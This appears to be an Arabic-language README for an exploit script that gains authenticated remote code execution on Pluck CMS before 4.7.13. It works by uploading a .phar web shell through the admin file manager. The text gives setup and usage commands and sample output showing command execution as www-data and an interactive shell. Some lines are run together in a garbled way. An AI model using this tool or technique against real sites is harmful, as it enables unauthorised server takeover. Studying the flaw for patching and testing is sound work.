
تنفيذ تعليمات برمجية عن بُعد للمستخدمين المصادق عليهم في نظام إدارة المحتوى Pluck قبل الإصدار 4.7.13.
تنفيذ أوامر عن بُعد موثّق في Pluck CMS قبل الإصدار 4.7.13. لا يتحقق مدير الملفات الخاص بالمشرف (
admin.php?action=files) من امتدادات الملفات، مما يسمح برفع ملفات.pharالتي ينفذها Apache كـ PHP. يؤدي رصد شل ويب عبر هذه النقطة إلى تنفيذ الأوامر كمستخدم خادم الويب.
shell.phar عبر مدير ملفات المشرف.id.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
# Pluck في المسار الرئيسي
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD
# Pluck في مجلد فرعي
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck
مثال:
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] يتم تسجيل الدخول...
[+] تم تسجيل الدخول
[*] جارٍ رفع شل الويب...
[+] تم رفع شل الويب
[*] عنوان شل: http://10.10.10.10/files/shell.phar
[+] الهدف ضعيف! المخرجات: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] تم فتح الشل. اكتب 'exit' أو Ctrl+C للخروج.
Shell> whoami
www-data